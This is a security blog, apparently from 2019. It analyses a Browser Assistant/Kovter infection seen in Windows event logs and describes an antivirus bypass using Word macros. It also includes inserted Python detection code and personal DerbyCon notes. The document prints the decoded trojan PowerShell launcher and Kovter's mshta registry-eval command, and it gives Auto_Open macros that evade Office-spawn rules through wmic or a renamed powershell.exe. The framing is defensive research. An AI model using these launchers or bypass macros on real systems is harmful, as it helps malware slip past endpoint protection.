Wednesday, September 25, 2019

Powershell Encoded Payload In Clear Text in Windows Event Log 4688

Found something kind of interesting that analysts might want to be aware of.

For months, there was this device that kept trying to execute a Powershell payload.  I could see it in the logs of a well-known vendor.  At first it looks like this because this vendor decided everything should be in caps.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ENCODEDCOMMAND JAB3AD0AJABLAG4ADGA6AEEAUABQAEQAQQBUAEEAKWANAFWAQGBYAG8ADWBZAGUACGAGAEEACWBZAGKACWB0AGEABGB0AFWAJWA7AFSAUGBLAGYABABLAGMADABPAG8ABGAUAEEACWBZAGUABQBIAGWAEQBDADOAOGBMAG8AYQBKACGAWWB

I put in a request for them to allow that field to be upper/lower case.  So then I see this:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB

The payload decodes to this:

$w=$env:APPDATA+'\Browser Assistant\';[Reflection.Assembly]::Load([

This vendor truncates the payload. >:(
 
I Google it - thinking I might get lucky.  It's a Browser Assistant Trojan.  https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/
 
Sometimes it's hard to believe something is infected, especially if this AV solution keeps saying that it's blocking it.  I kept looking for the encoded command in Powershell logs 4103 and 4104 - no luck.
 
Found out that if I did this:  Get-WinEvent -FilterHashtable @{logname="Security";id="4688";} | Select -Expand Message | ?{$_ -like "*powershell*"} | ?{$_ -like "*Reflection*"}, I found it.  It was in clear text!  The examples on security blogs show it in its encoded form.  I've seen it in the logs as encoded text before.  Why is this one different?

I assume it was in clear text because when that payload was loaded into memory, it was decoded.  The event 4688 in the Security log is for process creation.  The process was actually created.  It's weird because the AV solution said it blocked it.  This has been going on since June, and I finally have proof that there's a problem.  I could try to clean it up, because I have the IOCs in that article, but the IOCs change all the time.  You'll see that the actual decoded payload doesn't match what's in that article.  It loads a specific version of .NET for starters.  The actual decoded payload is this:
 
powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"
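Two things worth knowing at this point, shown as an added example that is not part of the original post: -EncodedCommand is the script as UTF-16LE run through base64, so a console that upper-cases the field destroys it (base64 is case-sensitive), while a field that merely truncates it can still be decoded up to the cut once the base64 is re-padded.  Also, `powershell {scriptblock}` invoked from inside PowerShell starts a second powershell.exe and hands it the block as -EncodedCommand, which is why the same payload can turn up encoded in one process-creation record and in clear text in its parent's.  The Python below decodes the truncated value quoted above, builds a constructed set of 4688 message bodies (the clear-text launcher from this post, the child that `&powershell{...}` starts with the inner block re-encoded, and benign noise), and runs the same "powershell plus Reflection" hunt over both the clear text and anything it decodes.  The message layout, the encode_command/decode_encoded_command/triage_4688/scan names and the indicator list are this example's own choices.

```python
import base64
import re

# The base64 exactly as the vendor console showed it after the case fix: mixed case, cut off mid-payload.
TRUNCATED_FROM_POST = "JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB"

# The inner block of the clear-text launcher, taken from the decoded payload in this post.
INNER_SCRIPT = (
    r"$w=$env:APPDATA+'\Browser Assistant\';[Reflection.Assembly]::Load("
    r"[System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()"
)


def encode_command(script):
    """Produce what powershell.exe expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Decode an -EncodedCommand value, tolerating one a log field cut off mid-payload:
    strip anything that is not base64, re-pad, and drop a dangling half of a UTF-16 unit."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", b64)
    if len(cleaned) % 4 == 1:      # a lone trailing sextet carries no whole byte
        cleaned = cleaned[:-1]
    raw = base64.b64decode(cleaned + "=" * (-len(cleaned) % 4))
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# -ExecutionPolicy and -ep do not match because a space must follow the prefix.
ENC_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CMDLINE_FIELD = re.compile(r"Process Command Line:[ \t]*(.*)")

# Strings shared by the clear-text launcher and its encoded child.
INDICATORS = ("Reflection.Assembly", "Browser Assistant", "Updater.dll", "ReadAllBytes")


def triage_4688(message):
    """Pull the command line out of a 4688 message body, decode any -EncodedCommand,
    and report which indicators appear in the clear text or in the decoded text."""
    m = CMDLINE_FIELD.search(message)
    if not m:
        return None
    cmdline = m.group(1).strip()
    decoded = [decode_encoded_command(b) for b in ENC_ARG.findall(cmdline)]
    haystack = "\n".join([cmdline, *decoded]).lower()
    return {"command_line": cmdline, "decoded": decoded,
            "hits": [i for i in INDICATORS if i.lower() in haystack]}


def scan(messages):
    """Keep only the events that matched at least one indicator."""
    return [r for r in (triage_4688(m) for m in messages) if r and r["hits"]]


# Constructed 4688 message bodies, not real exports: the clear-text launcher quoted in
# this post, the child that &powershell{...} starts (inner block re-encoded), and benign noise.
SAMPLE_4688_MESSAGES = [
    r"""A new process has been created.
Process Information:
    New Process Name:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Process Command Line:    powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"
""",
    "A new process has been created.\nProcess Information:\n"
    r"    New Process Name:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    "\n    Process Command Line:    powershell.exe -encodedCommand "
    + encode_command(INNER_SCRIPT) + " -inputFormat xml -outputFormat text\n",
    "A new process has been created.\nProcess Information:\n"
    "    Process Command Line:    powershell.exe -NoProfile -Command Get-Date\n",
]

if __name__ == "__main__":
    print(decode_encoded_command(TRUNCATED_FROM_POST))
    for hit in scan(SAMPLE_4688_MESSAGES):
        print(hit["hits"], hit["decoded"] or "(clear text)")
```

Feeding the upper-cased version of the same value to decode_encoded_command gives garbage, which is the concrete reason to insist on a case-preserving command-line field.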

I haven't found what keeps starting this.  Looks like I'll have to keep looking.

###Update####

Been a while since I touched this blog.  I've been so busy with cyber defense, CTFs, and Holiday Hack.  Never thought that this would be my job, but it is.  Sometimes I feel a little over my head.  I wanted to revisit this for a while.  I did find out what was causing it to execute over a year ago.  The process that kept launching this was a variant of Kovter.  https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

Found some other indicators and an obfuscated binary in the registry.

"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajfl");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";" <--this kept running over and over again.

HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers
Name: Images <base64encoded binary>

HKLM:\Software\fcscgkz
lqje: <obfuscated binary> - This isn't base64 encoded.  Trust me, you'll know if you see it.  It looks random.
flwxqgajfl: <base64 encoded strings><bunch of hex that looks like shell code.>
uzksi: S6xXx9mdNmjlJA==
ppaj: Q/cIl47JZi1rc8ijJL1FKrCPtHaJv7U=
ggxo: E/BWwN7BYJWCwSskHqL/kjk=
boadvfk: FqcLk4zANi4kDWir28Afgte9/ujOKjBjpDNsCg5OyaP7nnOuSgzYVDskh2OyNaD1KtQqcCIosyWWjkLoFIwTMnlSD1c=
fthhhtkk:<base64 encoded binary>
oass: <base64 encoded binary>
3ecf9d7c3f: what looks like an array of decimals.  Might be byte code or characters in decimal form.

I would hazard a guess that those keys are probably randomized, so they might not look the same from sample to sample.
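A triage helper for launchers like the one quoted above, added here as an example rather than something from the original post: given mshta.exe command lines from process-creation events, it pulls out the in-line javascript: body, the registry values that RegRead() fetches (undoing the doubled JScript backslashes), and whether the result goes into eval(), which is the registry-resident pattern.  It also builds the reg.exe query that dumps a value, and renders a comma-separated decimal array as characters so a value like the one named 3ecf9d7c3f can be checked by eye.  The second and third command lines and the decimal array are constructed for the example, and the function names are mine.

```python
import re

# Command lines as a 4688 or Sysmon event would record them. The first is the Kovter
# launcher quoted in this post (joined back onto one line); the other two are constructed
# for this example and are not from the infected host.
SAMPLE_COMMAND_LINES = [
    r'''"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajfl");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";"''',
    r'''"C:\Windows\system32\mshta.exe" "javascript:a=new ActiveXObject("WScript.Shell");eval(a.RegRead("HKLM\\SOFTWARE\\fcscgkz\\lqje"));"''',
    r'''"C:\Windows\system32\mshta.exe" C:\Users\Bob\Downloads\report.hta''',
]

INLINE_SCRIPT = re.compile(r'"?(?:javascript|vbscript):(.*)$', re.IGNORECASE | re.DOTALL)
REG_READ = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
EVAL_CALL = re.compile(r'\beval\s*\(', re.IGNORECASE)


def parse_mshta_launcher(cmdline):
    """For an mshta.exe command line carrying an in-line javascript:/vbscript: body, return
    the script, the registry values it reads and how many eval() calls it makes.
    Returns None for anything else, including mshta opening an ordinary .hta file."""
    if "mshta" not in cmdline.lower():
        return None
    m = INLINE_SCRIPT.search(cmdline)
    if not m:
        return None
    script = m.group(1)
    # JScript source doubles the backslashes; undo that to get the real registry path.
    reads = [p.replace("\\\\", "\\") for p in REG_READ.findall(script)]
    return {"script": script, "registry_reads": reads, "evals": len(EVAL_CALL.findall(script))}


def is_registry_resident_launcher(cmdline):
    """The Kovter pattern: an in-line script that reads a registry value and eval()s it."""
    info = parse_mshta_launcher(cmdline)
    return bool(info and info["registry_reads"] and info["evals"])


def reg_query_command(value_path):
    """Turn a hive-key-value path into the reg.exe query that dumps that value."""
    key, _, name = value_path.rpartition("\\")
    return 'reg query "%s" /v %s' % (key, name)


def decode_decimal_array(text):
    """Render a comma-separated list of decimal character codes as text, the quick check
    for whether a value like the post's 3ecf9d7c3f is script stored as numbers."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", text))


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        info = parse_mshta_launcher(line)
        if info and is_registry_resident_launcher(line):
            for path in info["registry_reads"]:
                print("registry-resident payload, dump it with:", reg_query_command(path))
    print(decode_decimal_array("118, 97, 114, 32, 119, 115, 104, 61"))   # constructed sample
```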


Tuesday, September 24, 2019

AV Bypass

Found a way to bypass a well-known Enterprise AV solution a while ago.  I'm afraid to disclose it to anyone other than the vendor.  I disclosed it to that particular vendor, and they haven't quite solved the problem, yet.  I don't want to cause anyone any undue hardship from disclosing this particular vulnerability, but it's probably already well-known.  The difficulty in solving this is that the way to bypass this AV uses Windows built-in tools and it produces a lot of false positives.  This vendor thought that they had a solution in a signature update, but it didn't cover the wide variety of ways that this particular Windows built-in tool could be used.  I'm horrified by this, but not exactly surprised.  This is why defense in depth is so vitally important.  Where one solution fails, another will succeed.

I wish I could say more.  I can't quite figure out how it works.  I'm scratching my head because it shouldn't work.  I put protections in place by making custom rules, and it's not firing on any of the custom rules even though it should.  Thought I had an idea of why.  That was proven to be wrong.  Wish I could figure this out because if I found it, I'm fairly certain the bad guys have probably already found it.

I guess I can release the exploit.  Someone will figure out who the vendor is.  I just hope that by releasing this, a fix can be made.  Some of you will say, "Well, Emotet does that..."  You're right - but does it do it in this exact way?  Emotet was what inspired me to try this.  And yes, I know, this isn't l33t.

Create a macro in Word and add this technique:

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub


Here's another one bypassing a custom rule telling my AV solution not to allow winword.exe to run powershell.exe, by copying powershell.exe to my Desktop and renaming it to dog.exe.

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub

Showing these as well - Windows Events - to help detect this.

Process Create:
UtcTime: 2019-09-23 20:47:36.217
ProcessGuid: {}
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""
CurrentDirectory: C:\WINDOWS\system32\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 7088
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: "C:\Windows\explorer.exe" /LOADSAVEDWINDOW

Process Create:
UtcTime: 2019-09-23 20:47:39.828
ProcessGuid: {}
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
CurrentDirectory: c:\windows\system32\spool\drivers\x64\3\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 6868
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding
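The two records above are Sysmon event ID 1 (Process Create) bodies, and they show why a parent/child rule on WINWORD.EXE spawning powershell.exe misses both macros: `wmic process call create` hands the launch to WMI, so the PowerShell process arrives with WmiPrvSE.exe as its parent, and a copy of powershell.exe called dog.exe never matches an image-name rule at all.  Below is an added example (not from the original post) of rules that key on what survives: Office spawning wmic.exe or anything from a user-profile path, PowerShell whose parent is WmiPrvSE.exe, and a process that is not called powershell.exe yet carries PowerShell-only syntax on its command line or, on Sysmon 10 and later, an OriginalFileName of PowerShell.EXE taken from the binary's version resource.  The wmic.exe and dog.exe records are constructed for the example, the post's two records are trimmed to the fields the rules read, and the rule names are mine.  Renaming the host also does not silence PowerShell's own script block logging (event 4104), which the engine emits regardless of the executable's file name.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
LOLBINS = {"wmic.exe", "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# Syntax only a PowerShell host understands; a copy of powershell.exe called dog.exe still needs it.
PS_SYNTAX = re.compile(
    r"\b(?:Start-Process|Invoke-Expression|IEX|New-Object|Invoke-WebRequest)\b"
    r"|-(?:ExecutionPolicy|EncodedCommand|enc|NoProfile|WindowStyle)\b",
    re.IGNORECASE,
)


def parse_sysmon_text(block):
    """Turn the 'Field: value' lines of a Sysmon event ID 1 body into a dict."""
    event = {}
    for line in block.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            event[key.strip()] = value.strip()
    return event


def basename(path):
    return path.strip().strip('"').rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules this process-creation event trips."""
    image_path = event.get("Image", "").strip().strip('"')
    image = basename(image_path)
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    original = event.get("OriginalFileName", "").lower()   # present on Sysmon 10+ only
    hits = []
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    if parent in OFFICE_APPS and image_path.lower().startswith("c:\\users\\"):
        hits.append("office_spawns_from_user_profile")
    if parent == "wmiprvse.exe" and (image in POWERSHELL_HOSTS or PS_SYNTAX.search(cmdline)):
        hits.append("wmi_spawned_powershell")
    # A renamed host: PowerShell-only syntax with no powershell.exe anywhere on the line,
    # or the version resource giving the binary away regardless of its file name.
    if image not in POWERSHELL_HOSTS and (
        original == "powershell.exe"
        or (PS_SYNTAX.search(cmdline) and "powershell" not in cmdline.lower())
    ):
        hits.append("renamed_powershell")
    return hits


def scan(blocks):
    """(ProcessId, rules tripped) for every event in the batch."""
    return [(e.get("ProcessId"), evaluate(e)) for e in map(parse_sysmon_text, blocks)]


# The post's two records trimmed to the fields used, then two constructed records for the
# wmic.exe hop and the renamed dog.exe copy (OriginalFileName as Sysmon 10+ would record it).
SAMPLE_EVENTS = [
    r"""Process Create:
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""
ParentImage: C:\Windows\explorer.exe
""",
    r"""Process Create:
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
""",
    r"""Process Create:
ProcessId: 9001
Image: C:\Windows\System32\wbem\WMIC.exe
CommandLine: wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'
ParentImage: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
""",
    r"""Process Create:
ProcessId: 9002
Image: C:\Users\Bob\Desktop\dog.exe
OriginalFileName: PowerShell.EXE
CommandLine: C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
ParentImage: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
""",
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS):
        print(pid, rules or "-")
```

The WINWORD.EXE record itself trips nothing, which is the point: the signal is in the processes around it, not in Word starting.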

Saturday, September 7, 2019

Final Derbycon?

Can't believe it's the end.  Only 2nd year that I've gone.  Never expected to go, but turns out that my boss really likes this con, and I can see why.  Plenty of people are nice, and friendly.  I posted about awkwardness really early yesterday morning, but that was my personal problem, not the problem of others.

Only thing was a vendor who was a little rude, but that's not Derby's fault.  That reflects badly on his company.  I tweeted about it.   Also, I'm not saying he's the devil incarnate.  Seems obvious to me that I was there to look at the product, but maybe he didn't realize.  It's possible.

This week has been a huge dose of humble pie.  It's yet again confirmed that I still need to learn so much.  Yeah, I know, shocker.  I'd like to try to get an OSCP someday- mostly just to see if it's possible.

Had Practical Burp:  Advanced Techniques (PBAT) training this week - it's from here:  https://www.lanmaster53.com/training/.  He was offering it at Derbycon, and in the ticket race, that's what my boss could get.  Strangely enough, it does kind of mesh with my job.  I really need to study how common web apps work if I really want to get the most out of that training.  I know the basics - OWASP Top 10, some of what they mean, and some about how they work, but in order to execute them properly, I need to know the underpinnings of the apps.  What weird caveats does each language have that I can leverage?  Kind of like the weird PHP comparison operators - or that you can use variables without the $ sign in some cases. 

I tried the Derbycon CTF.  It's meant for beginner up, but there's not really a lot of guidance to it.  You get a scope of IPs and have at it.  I figured out some of it, but if it's any indication of my skills, I could use some more practice.  I did learn something new, though, so that was cool.  Almost gave up on the CTF.  The wireless connection was slow.  Some machines that were up weren't showing as up.  Some kept going down right after they said that they were up.  That was a little bit of a nightmare.  Glad that I didn't give up though - considering I learned something.  I think that this was good practice to expect for the OSCP.  I hear you get study material, you study it so long, then you have to try to pwn a certain number of machines in 24 hours and you write a report in that time.  I hear most people don't pass it first time around.  I'm a little afraid to try a first time because what if I never pass it?   I guess I should think like that movie - "If I can't go on, I'll go on"?

Both concerts were awesome.  I'm so glad I went.  Discovered new music that I like.  It's by Infected Mushroom.  Didn't know who they were before attending.

Signed a Trevor memorial card.  That was so fun watching that escalate 3 years ago on Twitter - then to see the memorial last year, and the memorial this year.  Trevor will always be in our hearts. :D  #trevorforget

I'm going to miss Derby.  It just started for me, but the impact it's had...  I hope someone tries to bring it back.

The Spark

3:30AM.  Going to be really tired in the morning.  Having trouble sleeping.  One of Trevor's family members is in my hotel room - not sure how it got in here, but the things freak me out.  Sometimes you can be surrounded by people and feel lonelier than ever.  I wish I had that spark.  You know, the ease that some people have relating to each other and having conversations with each other.  I'd like to be positive and inspirational all the time, but I just can't be.  Not when I don't feel positive or inspirational.  Trying to enjoy the last Derbycon as much as I can, but it's not easy.  When I'm in huge groups, I just feel like I take up too much space.  I try to shy away from people.  I'm awkward when I talk to people as well.  I have plenty going on in my head, but not much to say.  And I keep saying the dumbest things.  Someone I look up to actually said, "Hi" to me.  (I'm still surprised when people I look up to say "Hi" to me.)  I said something and I guess he didn't get the reference, or he thinks I'm weird - maybe both.  I am weird, but that's besides the point.  I was referencing a movie I really like, an old black and white film, and he'd talked about having conversations with imaginary people/figures and well, that's what the movie was about.  I realized that it could be taken offensively.  The guy in the movie drank a lot and people thought that he was insane.  I doubt that this particular person reads my blog/journal, but if he does, I did not mean to offend you.  I apologize.

Feels like I'm always saying sorry for something.  Constant foot in my mouth type problem.  Just for future reference, if I say something offensive, I'm usually not intending to be offensive.  I just don't realize it's offensive until later.  I blame part of this on my upbringing.  I'd rather not get into personal details, but suffice it to say, it wasn't the best. 

At least I felt better in the concert.  That was loud enough that I didn't have to talk to anyone. 

This social stuff is why I prefer writing and singing oddly enough.  I don't have to immediately send out what comes into my head.  I can reflect on it and consider how others might interpret it before sending it out.  As for singing, I believe I've mentioned this before, it's someone else's words, and people tend to look past your appearance if they think you have an ok voice.  It doesn't even have to be a mediocre voice - just generally pleasant. 

I'm writing this because this is kind of a journal to me - not really something I expect people to read.  But if they do, it's not a big deal.  The issue I have with myself, is my mind.  Most people I say stupid or weird things to probably don't dwell on what I said, they probably think, "OK, she's a little weird", and they move on.  But I replay the dumb things.  Kind of the "Dumbest Things I've Said Playlist". 

If I was giving advice to someone, I'd tell them to not dwell on this.  Seems like I need to take my own advice sometimes.  If someone actually does read this, if you're wondering, "If being around crowds gives you such anxiety, then why go?"  I won't be successful with a social roadblock.  If no one knows who I am, how can they trust me enough to hire me, be my friend, or my mentor?  So, what do you do?  Mingle - just try not to be weird like me.